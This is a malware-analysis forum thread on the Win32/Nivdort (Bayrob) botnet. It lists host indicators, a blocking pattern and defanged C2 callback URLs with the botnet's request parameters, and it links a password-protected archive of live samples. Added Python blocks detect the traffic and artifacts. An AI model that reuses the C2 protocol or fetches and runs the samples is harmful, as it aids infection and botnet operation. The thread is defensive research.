Win32/Nivdort

Forum for analysis and discussion about malware.

Win32/Nivdort

Postby unixfreaxjp » Wed Nov 06, 2013 1:16 pm

I couldn't find this topic, so first please allow me to post the malware's base information (based on 2 months of tracking this botnet).

Variant Name:
Code:
Win32/Nivdort
sometimes as Win32/Bayrob or as Symmi (very confusing..)

Typical characteristics to quickly identify this threat:
Code:
//autostart..
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\**etc etc

// usual kick up service..
SERVICES_ACTIVE_DATABASE

// overwrites the hosts file (the Unix equivalent is /etc/hosts) ...
C:\WINDOWS\system32\drivers\etc\hosts

// exe in temp....
C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\zvostv1nl1hdgydpehn.exe (random example)

// exe implanted...
C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\zmgbnushjwx.exe
C:\WINDOWS\system32\zmgbnushjwx(random example).exe

// accessing path like:
C:\WINDOWS\system32\pouuifospsdv(random example)\tst
C:\WINDOWS\system32\pouuifospsdv(random example)\lck
C:\WINDOWS\system32\pouuifospsdv(random example)\upd
C:\WINDOWS\system32\pouuifospsdv(random example)\etc
C:\WINDOWS\system32\pouuifospsdv(random example)\run

// tweaked infected PC security level:
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallOverride (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusOverride (1)

//And your internet/proxy setting...
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = "1"
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy (1)
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings (1)

// ..obviously to open a proxy on 80
$cat %UserProfile%\Application Data\Mozilla\Firefox\Profiles\[CURRENT PROFILE]\user.js
user_pref("network.proxy.type", 0);

Sniffed information (for stealing purposes):
Code:
*.ebay.com
*.ups.exe
*.escrow.com

Botnet Commands:
Code:
// Requests (details are in the Botnet Callbacks PoC section):
method= validate (&mode=sox,email), ping, cfg, var-ip,
        setvar (&key=cpuinfo&value=%CPU%),
        checkport (&port=51573), all&flag

rsid=infected/HostID
sox=IP Address in Hex
v=VERSION_NUMBER ; or ; ver=VERSION_NUMBER (001-013)

Botnet sent values (FLAGS)
Code:
lport=0,1
slots=0,1
spm=0,1 // noted this flag exists.. suspected spam function

Mitigation string for blocking purposes (note: this is not a regex):
Code:
*/forum/search.php?method=*

Botnet Callbacks PoC:
Code:
h00p://lookloss.net/forum/                     search.php?method=validate&mode=my&email=EMAIL-ADDR@DOMAIN.COM&lici=auto_000860&ver=013

h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=002&sox=2521d800
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://signform.net/forum/                     search.php?method=validate&mode=sox&v=000&sox=2c453000

h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01

h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://elementarimagine.com/forum/             search.php?method=ping&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=cfg&oknet&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=var-ip&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3184+MHz)
                                                         &mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=stopped&value=2cb48400
                                                         &mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=2cb48400&slots=0&spm=0
                                          
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://palsticsurgery-community.com/forum/     search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://palsticsurgery-community.com/forum/     search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01

h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://elementarimagine.com/forum/             search.php?method=ping&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=cfg&oknet&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=var-ip&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)
                                                        &mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=all&flag&mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)
                                                         &mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=005&sox=2c905800
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=checkport&port=51573&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://faircross.net/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602

h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=all&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0

Recent Samples Investigated:
Code:
https://www.virustotal.com/en/file/b8b93f40046495d44c6855a1c86c9357a030023c914d298bb9b60551b21d79b3/analysis/
https://www.virustotal.com/en/file/eea059174127860154f4dce1a7d8995a9a5056febf73819d63ddadb522ed6c8f/analysis/
https://www.virustotal.com/en/file/07d753966944f8425453bf201c51873abc67f674d9582bcc90e4532efeea67c6/analysis/
https://www.virustotal.com/en/file/ae6a43cc8b47819407b5e8852bdf554be8f1ad0364345963bfd44b3c3cdb9556/analysis/
https://www.virustotal.com/en/file/416d3eda1483e0addbcba0218750f75a90c569ba4cf5e2227e1d909fdf93d630/analysis/
https://www.virustotal.com/en/file/c4b29278fc90c4e87a1d3d524c96373f7326726b9c653b5d62d4555265ec7215/analysis/
https://www.virustotal.com/en/file/12a24575409c67c2860e58adba8333c70c8cc5f8a53f3910463323af7c7aca40/analysis/
https://www.virustotal.com/en/file/39598e475d12e492c1b7d2c1091c5ec040d3c8365d4825140a3cb743799e57c3/analysis/
https://www.virustotal.com/en/file/a9e2fe1dbb39902ff1cf2bcaabcf5676418c4dced3ddc18db680c7459dd9ab9c/analysis/
https://www.virustotal.com/en/file/e9ec6e9b74e5405a7427a8aee7beb4c522d2b97275fb19026bd8a33898f60249/analysis/
https://www.virustotal.com/en/file/2fa162050b6cf23feec40931b6b8f10f9addc3d00b2a8ab4c95c9c71bcfced96/analysis/
https://www.virustotal.com/en/file/37286961d40a37586e005ce6d9a9e88257d6299a2091802afa4ab2f21b875497/analysis/
https://www.virustotal.com/en/file/2fb070d0313b02008075a806455353367a95d49a077332a075c161b97726204a/analysis/
https://www.virustotal.com/en/file/484994eaa8da3e419e5e175a47020ffdb41aee38f13d9aa45c2c614a297c42a1/analysis/
Last edited by unixfreaxjp on Wed Nov 06, 2013 1:56 pm, edited 7 times in total.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89
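The callback list in the post above gives the full shape of a C2 request, and the post is explicit that its blocking string is a glob, not a regex. The following is an added example, not code from the post or from the botnet operators: it turns that glob into an anchored regex (escaping the literal `?`, which a naive glob-to-regex translation would treat as a one-character wildcard), runs it over a constructed Squid-style proxy log, pulls out method, version, sox, rsid and the bare flags (`&flag`, `&oknet`), and decodes `sox` as a 4-byte IP. The post does not state the byte order of `sox`, so network order is an assumption here and the decoder takes a switch to flip it. The log lines are constructed; the hosts, paths and parameter names are the ones the post lists.

```python
"""Flag Nivdort/Bayrob C2 callbacks in a proxy log and decode the query.

Added example, not code from the forum post. The log lines are constructed;
the hosts, paths and parameter names are the ones listed in the post's
callback PoC. The byte order used to decode 'sox' is an assumption.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# The post's blocking string is a glob, not a regex: only '*' is a wildcard.
# The '?' before 'method=' is the literal query separator, so it must be
# escaped rather than treated as a one-character wildcard.
MITIGATION_GLOB = "*/forum/search.php?method=*"


def glob_to_regex(glob: str) -> re.Pattern:
    """Translate a '*'-only glob into an anchored regex; all else is literal."""
    return re.compile("^" + ".*".join(re.escape(p) for p in glob.split("*")) + "$")


C2_RE = glob_to_regex(MITIGATION_GLOB)

# Methods seen in the post; anything else still gets flagged, just unclassified.
KNOWN_METHODS = {"validate", "ping", "cfg", "var-ip", "setvar", "checkport", "all"}


def decode_sox(sox_hex: str, network_order: bool = True) -> str:
    """The post describes 'sox' as an IP address in hex but not its byte
    order; network (big-endian) order is an ASSUMPTION, flip it if wrong."""
    raw = bytes.fromhex(sox_hex)
    if len(raw) != 4:
        raise ValueError(f"sox is not 4 bytes: {sox_hex!r}")
    if not network_order:
        raw = raw[::-1]
    return ".".join(str(b) for b in raw)


def parse_callback(url: str) -> Optional[dict]:
    """Return the decoded C2 fields for a matching URL, or None."""
    if not C2_RE.match(url):
        return None
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)

    def first(key: str) -> str:
        return q.get(key, [""])[0]

    method = first("method")
    sox = first("sox")
    return {
        "host": parts.hostname,
        "method": method,
        "known_method": method in KNOWN_METHODS,
        "version": first("v") or first("ver"),  # both spellings appear in the post
        "sox": sox,
        "sox_ip": decode_sox(sox) if sox else None,
        "rsid": first("rsid"),
        "key": first("key"),
        "value": first("value"),
        # bare tokens such as '&flag' and '&oknet' carry no value
        "flags": sorted(k for k, v in q.items() if v == [""]),
    }


def scan_log(lines):
    """Return (timestamp, client, fields) for every line whose URL matches.
    Assumes a Squid-style line: ts client status verb url ..."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        parsed = parse_callback(fields[4])
        if parsed:
            hits.append((fields[0], fields[1], parsed))
    return hits


# Constructed log excerpt: four callbacks taken from the post plus one benign
# phpBB search that shares the path but not the 'method=' parameter.
SAMPLE_LOG = """\
1383743761.102 10.0.0.15 TCP_MISS/200 GET http://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
1383743762.410 10.0.0.15 TCP_MISS/200 GET http://elementarimagine.com/forum/search.php?method=ping&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
1383743763.001 10.0.0.15 TCP_MISS/200 GET http://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0
1383743770.555 10.0.0.22 TCP_MISS/200 GET http://forum.example.org/forum/search.php?keywords=nivdort&sf=titleonly
1383743771.900 10.0.0.15 TCP_MISS/200 GET http://elementarimagine.com/forum/search.php?method=checkport&port=51573&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
""".splitlines()

if __name__ == "__main__":
    for ts, client, c in scan_log(SAMPLE_LOG):
        print(ts, client, c["host"], c["method"], c["sox_ip"], c["flags"])
```

The benign phpBB line shares `/forum/search.php` with the C2 traffic, which is exactly why the post keys its blocking string on `method=` rather than on the path alone; the regex built here keeps that selectivity, and the flags list makes the `all&flag` and `cfg&oknet` variants visible without special-casing them.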

Re: Win32/Nivdort

Postby unixfreaxjp » Wed Nov 06, 2013 1:29 pm

You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89
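As an added example that is not part of either post above, here is an offline triage script for the host artifacts listed in the first post: a directory under System32 holding the five marker files (tst, lck, upd, etc, run), the same-named .exe dropped into both the Startup folder and System32, and the four Security Center values flipped to 1. It builds a constructed System32/Startup tree in a temp directory and parses a constructed `reg export` of the Security Center key; the directory and file names reuse the post's own random examples, and the Startup path is assumed to be the Documents and Settings layout the post shows.

```python
"""Offline triage for the Nivdort host artifacts listed in the first post.

Added example, not code from the post. The System32/Startup tree and the
.reg export are constructed in a temp dir. Directory and file names reuse
the post's random examples; only the marker file names and the four
Security Center value names are taken from the post as indicators.
"""
import re
import tempfile
from pathlib import Path

# Files the post shows being accessed under System32\<random>\
MARKER_FILES = {"tst", "lck", "upd", "etc", "run"}

# Security Center values the post lists as set to 1 on infected hosts.
SC_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center"
SC_VALUES = ("FirewallDisableNotify", "FirewallOverride",
             "AntiVirusDisableNotify", "AntiVirusOverride")
REG_LINE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<val>[0-9a-fA-F]{8})$')


def find_marker_dirs(system32: Path):
    """Directories directly under System32 that hold all five marker files."""
    hits = []
    for d in sorted(p for p in system32.iterdir() if p.is_dir()):
        names = {c.name for c in d.iterdir() if c.is_file()}
        if MARKER_FILES <= names:
            hits.append(d.name)
    return hits


def paired_startup_exes(startup: Path, system32: Path):
    """Same-named .exe present in both the user's Startup folder and System32,
    the pairing the post shows (zmgbnushjwx.exe in both)."""
    in_startup = {p.name.lower() for p in startup.glob("*.exe")}
    in_sys32 = {p.name.lower() for p in system32.glob("*.exe")}
    return sorted(in_startup & in_sys32)


def security_center_overrides(reg_text: str):
    """Parse a 'reg export' of the Security Center key and return the
    listed values whose data is 1 (the tweak the post describes)."""
    tripped, in_key = [], False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line[1:-1].lower() == SC_KEY.lower()
            continue
        m = REG_LINE.match(line)
        if in_key and m and m.group("name") in SC_VALUES and int(m.group("val"), 16) == 1:
            tripped.append(m.group("name"))
    return tripped


# Constructed .reg export; UpdatesDisableNotify is noise that must not match.
REG_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Security Center]
"FirewallDisableNotify"=dword:00000001
"FirewallOverride"=dword:00000001
"AntiVirusDisableNotify"=dword:00000000
"AntiVirusOverride"=dword:00000001
"UpdatesDisableNotify"=dword:00000001
"""


def build_fixture() -> Path:
    """Constructed tree mimicking an infected host (names from the post)."""
    root = Path(tempfile.mkdtemp(prefix="nivdort_triage_"))
    sys32 = root / "WINDOWS" / "system32"
    startup = root / "Documents and Settings" / "user" / "Start Menu" / "Programs" / "Startup"
    for d in (sys32 / "pouuifospsdv", sys32 / "wbem", startup):
        d.mkdir(parents=True)
    for name in MARKER_FILES:
        (sys32 / "pouuifospsdv" / name).write_bytes(b"")
    (sys32 / "wbem" / "tst").write_bytes(b"")        # partial set: must not match
    (sys32 / "zmgbnushjwx.exe").write_bytes(b"MZ")
    (startup / "zmgbnushjwx.exe").write_bytes(b"MZ")
    (sys32 / "calc.exe").write_bytes(b"MZ")           # only in System32: not paired
    return root


def triage(root: Path, reg_text: str = REG_EXPORT) -> dict:
    sys32 = root / "WINDOWS" / "system32"
    startup = root / "Documents and Settings" / "user" / "Start Menu" / "Programs" / "Startup"
    return {
        "marker_dirs": find_marker_dirs(sys32),
        "paired_exes": paired_startup_exes(startup, sys32),
        "security_center": security_center_overrides(reg_text),
    }


if __name__ == "__main__":
    print(triage(build_fixture()))
```

On a real host you would point `triage` at the live `%SystemRoot%` and the actual Startup folder and feed it the output of `reg export "HKLM\Software\Microsoft\Security Center"`; the marker-file set is the most specific of the three checks, since a random-named .exe alone will also show up in plenty of legitimate installs.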

Re: Win32/Nivdort

Postby mysarun88 » Fri Jul 24, 2015 11:24 am

Hi,
Can someone explain why there are so many threads getting created? Is it an anti-debugging technique?
mysarun88
 
Posts: 1
Joined: Thu Sep 04, 2014 5:19 am
Reputation point: 0

Re: Win32/Nivdort

Postby gandolf » Tue Aug 04, 2015 10:12 pm

Like you, I also get confused by the nomenclature used for this malware, and I did some work on it as well over the past week or so.

It has a DGA it uses to contact the CnC servers.
Another interesting thing some samples I've analyzed do is drop several payloads, some of which seem to indicate it is a bitcoin miner. I've attached all the dropped files from the sample I analyzed. I'll say more after I return from the BH conf.

The original (copied) executable is included in the archive (nkzwkphlco).

Archive can't be attached for some reason:
https://www.dropbox.com/s/ktlb79uq3z7cj ... d.zip?dl=0

pw:infected

mysarun88: I had the same curiosity about the thread flooding; each time it's called the thread is passed a new value. It could just be an anti-debugger/analysis technique. Although I did notice that when debugging, the process will kill itself and respawn after some idle time inside a debugger. These threads could be counters to track for debugging.
You do not have the required permissions to view the files attached to this post.
Last edited by Xylitol on Fri Aug 28, 2015 10:15 am, edited 1 time in total.
Reason: Attached the files (without .idb)
gandolf
 
Posts: 2
Joined: Fri Nov 08, 2013 2:55 pm
Reputation point: 0

Re: Win32/Nivdort

Postby zedbergeron » Fri Aug 28, 2015 6:58 am

What's with the multiple threads: it tries to compute a hash that will eventually be the correct address where it will jump to the malware code.
zedbergeron
 
Posts: 1
Joined: Fri Aug 28, 2015 6:54 am
Reputation point: 0

Re: Win32/Nivdort

Postby benkow_ » Tue Jan 19, 2016 9:13 am

Some samples grabbed by email this week.
8f67833b8e3bc4c2d5b6c394e3deb2ea23ed8a1d3106d26e1c7ee09c245a770d
5b7d045def5f2f85384a82ebddd13d4396215b4752a3da9e66255fb355d36a39
e679fdae883e53e5ab3772fc6ff1369f499c1a4490130d8c9c4bb387c390a98b
6b62df8fb1cfcfce4094dcea909ba3f8b196ec74e98a6f310da3862e762a0893
84fc45d569228b97faf52dbb7ebb9effd8a6f85ce0e265883944c3043237c369
386bf02fa4b44bfa18e7c3c0a2daa7616a800a1fc677c1267fff4dd693283e3f
You do not have the required permissions to view the files attached to this post.
benkow_
 
Posts: 70
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 44

Re: Win32/Nivdort

Postby malwareanalysyss » Mon Dec 19, 2016 9:30 am

Bayrob: Three suspects extradited to face charges in US
https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us
I will monitor the number of Nivdort/Bayrob samples on VT.
malwareanalysyss
 
Posts: 1
Joined: Wed Sep 18, 2013 8:48 am
Reputation point: 0

